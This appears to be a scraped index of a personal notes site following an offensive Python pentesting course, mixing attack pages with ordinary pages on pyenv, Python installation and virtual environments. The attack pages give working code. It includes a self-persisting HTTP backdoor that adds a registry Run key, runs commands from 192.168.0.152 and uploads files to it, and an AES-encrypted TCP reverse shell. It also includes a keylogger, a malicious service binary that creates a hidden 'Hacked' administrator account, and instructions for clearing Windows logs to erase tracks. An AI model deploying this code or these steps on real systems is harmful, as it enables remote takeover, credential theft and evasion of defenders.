  • Hijack the Internet Explorer process to bypass a host-based firewall.
  • Bypassing Next Generation Firewalls.
  • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
  • TCP reverse shell with AES encryption.
  • TCP reverse shell with RSA encryption.
  • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

                                  In order for a binary to persist, the binary must do three things:

1. Copy itself to a different location. We need a source path (the current working directory) and a destination path, for instance the Documents folder. This means that we need to know the username:

                                  ```cmd\n    c:\\Users\\<username>\\Documents\n```\n

2. Add a registry key pointing to the new exe location. This is done only the first time.

3. On subsequent runs, skip steps 1 and 2.

                                  ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#phases-for-persistence","title":"Phases for persistence","text":"","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#1-system-recognition","title":"1. System recognition","text":"

                                  Getting to know the current working directory + the user profile.
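
A minimal sketch of this recon step (using os.environ as a simpler alternative to the subprocess call the full client below relies on):

import os\n\npath = os.getcwd() # source: where the binary currently runs\nuserprof = os.environ.get('USERPROFILE') # e.g. C:\\Users\\<username>\ndestination = userprof + '\\\\Documents\\\\client.exe'\nprint(path, destination)\n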

                                  ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#2-copy-the-binary-to-a-different-location","title":"2. Copy the binary to a different location","text":"

                                  If the binary is not found in the destination folder, we can assume this is the first time we're running it. Then:

We will copy the binary to a different location. For that, we need a source path (the current working directory) and a destination path, for instance the Documents folder. This means that we need to know the current working directory (for the source path) and the username (for the destination path):

                                  ```cmd\n    c:\\Users\\<username>\\Documents\n```\n

                                  This information was already retrieved in step 1 (System recognition).

                                  ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#3-add-a-registry-key","title":"3. Add a Registry key","text":"

                                  If the binary is not found in the destination folder, we can assume this is the first time we're running it. Then:

                                  We will add a Registry key.

                                  ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#4-fire-up-our-shell","title":"4. Fire up our shell","text":"","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#client-side","title":"Client side","text":"

To be run on the victim's machine.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport requests\nimport os\nimport subprocess\nimport time\nimport shutil\nimport winreg as wreg\n\n# Recon phase\npath = os.getcwd()\n\nNull, userprof = subprocess.check_output('set USERPROFILE', shell=True,stdin=subprocess.PIPE,  stderr=subprocess.PIPE).decode().split('=')\n\ndestination = userprof.strip('\\n\\r') + '\\\\Documents\\\\' + 'client.exe'\n\n# If this is the first time our backdoor is executed, do phases 1 and 2\nif not os.path.exists(destination):\n    shutil.copyfile(path + '\\\\client.exe', destination) # You can replace path + '\\\\client.exe' with sys.argv[0], which returns the running file's path\n\n    key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, r\"Software\\Microsoft\\Windows\\CurrentVersion\\Run\", 0, wreg.KEY_ALL_ACCESS)\n    wreg.SetValueEx(key, 'RegUpdater', 0, wreg.REG_SZ, destination)\n    key.Close()\n\n\n\n# Last phase: start a reverse connection back to our Kali machine\n\nwhile True:\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            files = {'file': open(path, 'rb')}\n            r = requests.post(url, files=files)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/man-in-the-browser-attack/","title":"Man in the browser attack","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
  • Tuning the connection attempts.
  • Including cd command into TCP reverse shell.
• Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bare attacker public IP.
  • Making your binary persistent.
  • Making a screenshot.
  • Coding a reverse shell that searches files.
• Techniques for bypassing filters:
  • Coding a reverse shell that scans ports.
  • Hijack the Internet Explorer process to bypass a host-based firewall.
  • Bypassing Next Generation Firewalls.
  • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
  • TCP reverse shell with AES encryption.
  • TCP reverse shell with RSA encryption.
  • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

All browsers offer to save your username/password when you submit them in a login page, so the next time you visit the same page the credentials are filled in automatically without typing a single letter. Third-party software like LastPass does the same job.

If the target logs in this way, neither the keylogger nor the clipboard-hijacking methods will work.

Attackers overcome this scenario with an attack called man-in-the-browser.

In a nutshell, a man-in-the-browser attack intercepts the browser's API calls and extracts the data in clear text before it reaches the network socket, where it gets SSL-encrypted.

                                  ","tags":["python","python pentesting","techniques","firefox","browsers"]},{"location":"python/man-in-the-browser-attack/#steps-to-intercept-a-process-api-calls-are-","title":"Steps to intercept a process API calls are:-","text":"

A. Get the Process ID (PID) of the browser process

B. Attach a debugger to this PID

C. Specify the DLL library that you want to intercept

D. Specify the function name and resolve its memory address

E. Set a breakpoint and register a callback function

F. Wait for debug events using a debug loop

G. Once a debug event occurs (meaning the browser calls the function inside the DLL), execute the callback function

H. Resume the original process
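
A heavily simplified sketch of steps A, B, F and G using ctypes on Windows (the PID, the padded DEBUG_EVENT layout and the constants are illustrative assumptions; a real tool would also resolve the target function address and set the breakpoint, steps C-E):

import ctypes\nfrom ctypes import wintypes\n\nkernel32 = ctypes.windll.kernel32\nPID = 1234 # hypothetical browser PID (step A)\n\n# Step B: attach a debugger to the PID\nif not kernel32.DebugActiveProcess(PID):\n    raise ctypes.WinError()\n\nclass DEBUG_EVENT(ctypes.Structure): # simplified: oversized padding replaces the real event union\n    _fields_ = [('dwDebugEventCode', wintypes.DWORD),\n                ('dwProcessId', wintypes.DWORD),\n                ('dwThreadId', wintypes.DWORD),\n                ('u', ctypes.c_byte * 256)]\n\nDBG_CONTINUE = 0x00010002\nevent = DEBUG_EVENT()\n\n# Step F: wait for debug events in a loop\nwhile True:\n    if kernel32.WaitForDebugEvent(ctypes.byref(event), 100):\n        # Step G: a real tool would check for its breakpoint here and read\n        # the function arguments (the clear-text credentials) before continuing\n        kernel32.ContinueDebugEvent(event.dwProcessId, event.dwThreadId, DBG_CONTINUE)\n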

                                  ","tags":["python","python pentesting","techniques","firefox","browsers"]},{"location":"python/pip/","title":"Pip","text":"","tags":["python","scripting","package manager"]},{"location":"python/pip/#installation","title":"Installation","text":"","tags":["python","scripting","package manager"]},{"location":"python/pip/#basic-usage","title":"Basic usage","text":"","tags":["python","scripting","package manager"]},{"location":"python/pip/#some-interesting-libraries","title":"Some interesting libraries","text":"Library What it does Install More Info Pillow Pillow\u00a0and its predecessor,\u00a0PIL, are the original Python\u00a0libraries for dealing with images. pip install Pillow https://realpython.com/image-processing-with-the-python-pillow-library/","tags":["python","scripting","package manager"]},{"location":"python/privilege-escalation/","title":"Privilege escalation - Weak service file permission","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
  • Tuning the connection attempts.
  • Including cd command into TCP reverse shell.
• Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bare attacker public IP.
  • Making your binary persistent.
  • Making a screenshot.
  • Coding a reverse shell that searches files.
• Techniques for bypassing filters:
  • Coding a reverse shell that scans ports.
  • Hijack the Internet Explorer process to bypass a host-based firewall.
  • Bypassing Next Generation Firewalls.
  • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
  • TCP reverse shell with AES encryption.
  • TCP reverse shell with RSA encryption.
  • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/privilege-escalation/#setting-up-the-lab","title":"Setting up the lab","text":"

1. Download the vulnerable application from https://www.exploit-db.com/exploits/24872 and install it for all users on a Windows VM.

2. Create a non-admin account in the Windows VM. For instance: - user: nonadmin - password: 123123

3. Restart the Windows VM and log in as the nonadmin user.

4. Open the Photodex application and, in Task Manager, locate the service that gets created by the application. It's called ScsiAccess.

5. Open the properties of the ScsiAccess service and locate the path to the executable. It should be something like:

C:\\Program Files\\Photodex\\ProShow Producer\\ScsiAccess.exe\n

6. We can replace that file with a malicious service file that will be triggered when opening the Photodex application and escalate us to admin privileges.

7. Script for Windows 7 (go to step 8 for Windows 10; jump to step 9 after this step).

# Windows 7\nimport servicemanager\nimport win32serviceutil\nimport win32service\nimport win32api\n\nimport os\nimport ctypes\n\nclass Service(win32serviceutil.ServiceFramework):\n    _svc_name_ = 'ScsiAccess'\n    _svc_display_name_ = 'ScsiAccess'\n\n    def __init__(self, *args):\n        win32serviceutil.ServiceFramework.__init__(self, *args)\n\n    def sleep(self, sec):\n        win32api.Sleep(sec*1000, True)\n\n    def SvcDoRun(self):\n\n        self.ReportServiceStatus(win32service.SERVICE_START_PENDING)\n        try:\n            self.ReportServiceStatus(win32service.SERVICE_RUNNING)\n            self.start()\n\n        except:\n            self.SvcStop()\n    def SvcStop(self):\n        self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n        self.stop()\n        self.ReportServiceStatus(win32service.SERVICE_STOPPED)\n\n    def start(self):\n        self.runflag=True\n\n        f = open('C:/Users/nonadmin/Desktop/priv.txt', 'w')\n        if ctypes.windll.shell32.IsUserAnAdmin() == 0:\n            f.write('[-] We are NOT admin')\n        else:\n            f.write('[+] We are admin')\n        f.close()\n\n    def stop(self):\n        self.runflag=False\n\nif __name__ == '__main__':\n\n\n    servicemanager.Initialize()\n    servicemanager.PrepareToHostSingle(Service)\n    servicemanager.StartServiceCtrlDispatcher()\n    win32serviceutil.HandleCommandLine(Service)\n

We can use py2exe to craft an exe file from that Python script.

This setup file will convert the Python script scsiaccess.py into an exe file:

from distutils.core import setup\nimport py2exe, sys, os\n\nsys.argv.append(\"py2exe\")\nsetup(\n      options = {'py2exe': {'bundle_files': 1}},\n      windows = [ {'script': \"scsiaccess.py\"}],\n      zipfile = None\n)\n

                                  You can also use pyinstaller:

pyinstaller --onefile Create_New_Admin_account.py\n

                                  8. Script for Windows 10:

# The order of importing libraries matters: \"servicemanager\" must be imported after the win32X modules, as follows:\n\nimport win32serviceutil\nimport win32service\nimport win32api\nimport win32timezone\nimport win32net\nimport win32netcon\nimport servicemanager\n\n## the rest of the code is still the same\nimport os\nimport ctypes\n\nclass Service(win32serviceutil.ServiceFramework):\n    _svc_name_ = 'ScsiAccess'\n    _svc_display_name_ = 'ScsiAccess'\n\n    def __init__(self, *args):\n        win32serviceutil.ServiceFramework.__init__(self, *args)\n\n    def sleep(self, sec):\n        win32api.Sleep(sec*1000, True)\n\n    def SvcDoRun(self):\n\n        self.ReportServiceStatus(win32service.SERVICE_START_PENDING)\n        try:\n            self.ReportServiceStatus(win32service.SERVICE_RUNNING)\n            self.start()\n\n        except:\n            self.SvcStop()\n    def SvcStop(self):\n        self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n        self.stop()\n        self.ReportServiceStatus(win32service.SERVICE_STOPPED)\n\n    def start(self):\n        self.runflag=True\n\n        USER = \"Hacked\"\n        GROUP = \"Administrators\"\n        user_info = dict (\n            name = USER,\n            password = \"python\",\n            priv = win32netcon.USER_PRIV_USER,\n            home_dir = None,\n            comment = None,\n            flags = win32netcon.UF_SCRIPT,\n            script_path = None\n             )\n        user_group_info = dict (\n            domainandname = USER\n            )\n        try:\n            win32net.NetUserAdd (None, 1, user_info)\n            win32net.NetLocalGroupAddMembers (None, GROUP, 3, [user_group_info])\n        except Exception:\n            pass\n        ''' \n        f = open('C:/Users/nonadmin/Desktop/priv.txt', 'w')\n        if ctypes.windll.shell32.IsUserAnAdmin() == 0:\n            f.write('[-] We are NOT admin')\n        else:\n            f.write('[+] We are admin')\n        f.close()\n        '''\n    def stop(self):\n        self.runflag=False\n\nif __name__ == '__main__':\n\n\n    servicemanager.Initialize()\n    servicemanager.PrepareToHostSingle(Service)\n    servicemanager.StartServiceCtrlDispatcher()\n    win32serviceutil.HandleCommandLine(Service)\n

To export to an EXE, use:

pyinstaller --onefile Create_New_Admin_account.py\n

9. Replace the service file under:

C:\\Program Files (x86)\\Photodex\\ProShow Producer\n

10. Rename the original scsiaccess to scsiaccess123.

11. Put your Python exe there as scsiaccess (without .exe).

12. Restart and test: you should see that the \"Hacked\" account has been created.
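
To verify from a command prompt (standard Windows commands):

net user Hacked\nnet localgroup Administrators\n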

                                  ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/privilege-escalation/#python-script-to-check-if-we-are-admin-users-on-windows","title":"Python script to check if we are admin users on Windows","text":"
import ctypes\n\nif ctypes.windll.shell32.IsUserAnAdmin() == 0:\n    print('[-] We are NOT admin!')\nelse:\n    print('[+] We are admin :)')\n
                                  ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/privilege-escalation/#erasing-tracks","title":"Erasing tracks","text":"

Once you are admin, open Event Viewer and go to Windows Logs. Right-click the Application and Security logs and choose \"Clear Log\".
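
The same can be done from an elevated prompt with the built-in wevtutil utility:

wevtutil cl Application\nwevtutil cl Security\n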

                                  ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/pyenv/","title":"Pyenv","text":"

                                  Popular Python version management tool. Pyenv allows you to easily install and switch between multiple Python versions on the same machine.

                                  Source: https://github.com/pyenv/pyenv

                                  "},{"location":"python/pyenv/#installation-in-kali","title":"Installation in Kali","text":"

                                  Check out Pyenv where you want it installed. A good place to choose is $HOME/.pyenv (but you can install it somewhere else):

                                  git clone https://github.com/pyenv/pyenv.git ~/.pyenv\n

                                  Optionally, try to compile a dynamic Bash extension to speed up Pyenv. Don't worry if it fails; Pyenv will still work normally:

                                  cd ~/.pyenv && src/configure && make -C src\n

Define the environment variable PYENV_ROOT to point to the path where Pyenv will store its data. $HOME/.pyenv is the default. If you installed Pyenv via Git checkout, we recommend setting it to the location where you cloned it:

                                  echo 'export PYENV_ROOT=\"$HOME/.pyenv\"' >> ~/.zshrc\n

Add the pyenv executable to your PATH if it's not already there:

                                  echo 'command -v pyenv >/dev/null || export PATH=\"$PYENV_ROOT/bin:$PATH\"' >> ~/.zshrc \n

Run eval \"$(pyenv init -)\" to install pyenv into your shell as a shell function and enable shims and autocompletion:

                                  echo 'eval \"$(pyenv init -)\"' >> ~/.zshrc \n

Then, if you have ~/.profile, ~/.bash_profile or ~/.bash_login, add the commands there as well. If you have none of these, add them to ~/.profile. Not needed in this case, since we are using ~/.zshrc.

                                  If you wish to get Pyenv in noninteractive login shells as well, also add the commands to ~/.zprofile or ~/.zlogin.

                                  "},{"location":"python/pyenv/#basic-usage","title":"Basic usage","text":"

                                  Install the desired Python versions using pyenv:

                                  pyenv install 3.9.0\n

                                  See installed versions:

                                  pyenv versions\n

                                  Set global python version:

                                   pyenv global 2.7.18\n
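
You can also pin a version per project; pyenv reads it from a .python-version file in that directory:

pyenv local 3.9.0\n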
                                  "},{"location":"python/python-installation/","title":"Installing python","text":"","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#installing-python-38-on-ubuntu-20045","title":"Installing python 3.8 on Ubuntu 20.04.5","text":"

                                  First, update and upgrade:

                                  sudo apt update && sudo apt upgrade\n

Add a PPA for old Python versions. Old versions of Python such as 3.9, 3.8, 3.7 and older are not available in the default system repository of Ubuntu 22.04 LTS (Jammy Jellyfish) or 20.04 (Focal Fossa). Hence, we need to add the PPA offered by the \u201cdeadsnakes\u201d team to get the archived Python versions easily.

                                  sudo apt install software-properties-common\n
sudo add-apt-repository ppa:deadsnakes/ppa\n\n# If you get this error:\n# AttributeError: 'NoneType' object has no attribute 'people'\n# try installing python3-launchpadlib:\nsudo apt-get install python3-launchpadlib\n

Check the availability of the Python version you want. Syntax:

                                  sudo apt-cache policy python<version>\n

                                  In my case:

                                  sudo apt-cache policy python3.9\n

                                  Install the version you want:

                                  sudo apt install python3.9\n

                                  Set up a default version in your system:

# Check out existing versions\nls /usr/bin/python*\n\n# Check whether any version is configured as a python alternative. For that, run:\nsudo update-alternatives --list python\n\n# If the output is \u201cupdate-alternatives: error: no alternatives for python\u201d, no alternatives have been configured yet, so let's add some:\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3.9 1\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3.10 2\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3.8 3\n\n# Switch the default Python version\nsudo update-alternatives --config python\n
                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#other-methods","title":"Other methods","text":"

Not very orthodox, but:

# Check the current Python pointer\nls -l /usr/bin/python\n\n# Check available Python versions\nls -l /usr/bin/python*\n\n# Unlink the current python version\ncd /usr/bin\nsudo unlink python\n\n# Select the required python version and link it to the python command\nsudo ln -s /usr/bin/python2.7 python\n\n# Confirm the change in the pointer\nls -l /usr/bin/python\n
                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#installing-python-in-kali","title":"Installing python in Kali","text":"

If you are on Ubuntu 19.10 (or any other version unsupported by the deadsnakes PPA, as is the case with Kali), you will not be able to install using the deadsnakes PPA.

First, install the development packages required to build Python.

                                  sudo apt update\nsudo apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev curl\n

                                  Then download the tarball and extract it:

                                  wget https://www.python.org/ftp/python/3.9.19/Python-3.9.19.tar.xz\ntar -xf Python-3.9.19.tar.xz\n

                                  Once the Python tarball has been extracted, navigate to the configure script and execute it in your Linux terminal with:

                                  cd Python-3.9.19\n./configure\n

The configuration may take some time. Wait until it finishes successfully before proceeding.

If you want to create an alternative install of Python, start the build process:

                                  sudo make altinstall\n

                                  If you want to replace your current version of Python with this new version, you should uninstall your current Python package using your package manager (such as apt or dnf) and then install:

                                  sudo make install\n
                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#installing-pip","title":"Installing pip","text":"
                                  python3 -m pip install pip\n

If you get the error externally-managed-environment, the solution is to create a virtual environment. As the message explains, this is actually not an issue with Python itself, but rather your Linux distribution (Kali, Debian, etc.) implementing a deliberate policy to ensure you don't break your operating system and system packages by using pip (or Poetry, Hatch, PDM or another non-OS package manager) outside the protection of a virtual environment.
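
For example (the directory name is just an illustration):

python3 -m venv ~/.venvs/pentest\nsource ~/.venvs/pentest/bin/activate\npython3 -m pip install --upgrade pip\n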

                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#creating-a-virtual-environment","title":"Creating a virtual environment","text":"

                                  See virtual Environments.

                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#switch-python-versions","title":"Switch python versions","text":"

                                  See pyenv.

                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-keylogger/","title":"Simple keylogger in python","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
  • Tuning the connection attempts.
  • Including cd command into TCP reverse shell.
• Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bare attacker public IP.
  • Making your binary persistent.
  • Making a screenshot.
  • Coding a reverse shell that searches files.
• Techniques for bypassing filters:
  • Coding a reverse shell that scans ports.
  • Hijack the Internet Explorer process to bypass a host-based firewall.
  • Bypassing Next Generation Firewalls.
  • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
  • TCP reverse shell with AES encryption.
  • TCP reverse shell with RSA encryption.
  • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n#Ref: https://pythonhosted.org/pynput/keyboard.html#monitoring-the-keyboard\n\nfrom pynput.keyboard import Key, Listener\n\ndef on_press(key):\n    fp=open(\"keylogs.txt\",\"a\") #create a text file and append the key in it\n    print(key)\n    fp.write(str(key)+\"\\n\")\n    fp.close()\n\nwith Listener(on_press=on_press) as listener: # if key is pressed, call on_press function\n    listener.join()\n
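
The only dependency is pynput, which can be installed with pip:

pip install pynput\n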
                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/python-tools-for-pentesting/","title":"Python tools for pentesting","text":"

                                  Tools and techniques to achieve:

                                  • Coding your own reverse shell (TCP+HTTP).
• Exfiltrating data from the victim's machine.
• Using an anonymous shell by abusing Twitter, Google Forms and SourceForge.
• Hacking passwords with different techniques: coding a keylogger, performing clipboard hijacking.
• Bypassing some firewalls by including cryptographic encryption in your shells (AES, RSA, XOR).
• Writing scripts to perform privilege escalation on Windows by abusing a weak service. And more.
                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#contents","title":"Contents","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
  • Tuning the connection attempts.
  • Including cd command into TCP reverse shell.
• Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bare attacker public IP.
  • Making your binary persistent.
  • Making a screenshot.
  • Coding a reverse shell that searches files.
• Techniques for bypassing filters:
  • Coding a reverse shell that scans ports.
  • Hijack the Internet Explorer process to bypass a host-based firewall.
  • Bypassing Next Generation Firewalls.
  • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
  • TCP reverse shell with AES encryption.
  • TCP reverse shell with RSA encryption.
  • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#tools","title":"Tools","text":"","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#pyinstaller","title":"pyinstaller","text":"

                                  PyInstaller bundles a Python application and all its dependencies into a single package. The user can run the packaged app without installing a Python interpreter or any modules.

                                  See pyinstaller.

                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#py2exe","title":"py2exe","text":"

                                  This setup file will convert the python script scsiaccess.py into an exe file:

from distutils.core import setup\nimport py2exe, sys, os\n\nsys.argv.append(\"py2exe\")\nsetup(\n      options = {'py2exe': {'bundle_files': 1}},\n      windows = [ {'script': \"scsiaccess.py\"}],\n      zipfile = None\n)\n
                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#inmunity-debuger","title":"Inmunity Debuger","text":"

See Immunity Debugger.

                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-virtual-environments/","title":"Virtual environments","text":"","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#virtualenvwrapper","title":"virtualenvwrapper","text":"","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#installation","title":"Installation","text":"
# Make sure you have pip installed.\nsudo apt-get install python3-pip\n\n# Install virtualenvwrapper\nsudo pip3 install virtualenvwrapper\n\n# Open .bashrc:\nsudo gedit ~/.bashrc\n\n# After opening it, add the following lines to it:\n\nexport WORKON_HOME=$HOME/.virtualenvs\nexport PROJECT_HOME=$HOME/Devel\nsource /usr/local/bin/virtualenvwrapper.sh\n
                                  ","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#basic-usage","title":"Basic usage","text":"
# Create a virtual environment with mkvirtualenv\nmkvirtualenv nameOfEnvironment\n\n# List existing environments\nlsvirtualenv -b\n\n# Work on an environment\nworkon nameOfEnvironment\n\n# Close the current environment\ndeactivate\n\n# Delete a virtual environment\nrmvirtualenv nameOfEnvironment\n\n# To work on another version of python:\nmkvirtualenv -p python3.x venv_name\n# You will see something like this: (venv_name)\n

Back up a virtual environment before removing it:

                                  pip freeze > requirements.txt\n
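
To restore it later in a fresh environment:

pip install -r requirements.txt\n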
                                  ","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#venv","title":"venv","text":"
                                  python3 -m venv <DIR>\nsource <DIR>/bin/activate\n

On Windows, you can activate the virtual environment with:

                                  <DIR>\\Scripts\\activate\n
                                  ","tags":["database","relational","database","SQL"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/","title":"TCP reverse shell with AES encryption","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
  • Tuning the connection attempts.
  • Including cd command into TCP reverse shell.
• Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bare attacker public IP.
  • Making your binary persistent.
  • Making a screenshot.
  • Coding a reverse shell that searches files.
• Techniques for bypassing filters:
  • Coding a reverse shell that scans ports.
  • Hijack the Internet Explorer process to bypass a host-based firewall.
  • Bypassing Next Generation Firewalls.
  • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
  • TCP reverse shell with AES encryption.
  • TCP reverse shell with RSA encryption.
  • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/#client-side","title":"Client side","text":"

                                  To be run on the victim's machine.

                                  from Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\nimport socket\nimport subprocess\nkey = b\"H\" * 32\nIV = b\"H\" * 16\n\ndef encrypt(message):\n    encryptor = AES.new(key, AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16)\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(key, AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message, 16)\n    return decrypted_message\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = decrypt(s.recv(1024))\n        if 'terminate' in command.decode():\n             break\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n            s.send(encrypt(CMD.stdout.read()))\n\n\ndef main():\n    connect()\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/#server-side","title":"Server side","text":"
